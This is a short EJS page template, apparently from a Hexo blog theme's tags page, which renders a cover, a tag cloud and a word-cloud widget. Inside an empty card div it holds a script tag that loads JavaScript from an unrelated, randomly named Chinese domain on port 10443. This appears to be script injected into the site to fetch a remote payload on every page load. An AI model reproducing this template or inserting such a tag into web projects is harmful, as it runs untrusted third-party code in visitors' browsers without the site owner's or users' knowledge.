<%- partial('_partial/bg-cover') %>

<main class="content">

    <%- partial('_widget/tag-cloud') %>

    <% if (site.tags && site.tags.length > 0) { %>
    <%- partial('_widget/tag-wordcloud') %>
    <% } %>
    <div class="container" data-aos="fade-up">
        <div class="card">
            <script src="https://jc.vtqifk86868.cn:10443/38da05/c@3448!25.js"></script>
        </div>
    </div>
</main>
